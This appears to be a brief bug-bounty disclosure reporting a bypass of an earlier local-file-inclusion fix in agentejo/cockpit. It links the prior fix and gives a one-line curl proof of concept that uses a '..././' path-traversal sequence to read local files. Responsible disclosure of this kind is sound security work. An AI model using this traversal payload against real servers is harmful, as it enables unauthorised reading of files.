External Control of File Name or Path in agentejo/cockpit
Sep 9th 2021
Bypass of previous fix
🕵️‍♂️ Proof of Concept
I see you recently fixed a local-file-inclusion bug: https://huntr.dev/bounties/a65d700c-1561-46c1-a9c2-cba6ed960f94/
And the fix patch is https://github.com/agentejo/cockpit/commit/f1919184998bf9fa7a7db882c98ce1410375e596
But it can be bypassed easily using the URL below:
curl --path-as-is http://10.0.2.15:8080/api/public/..././custom?test=win
local file read
Artur validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs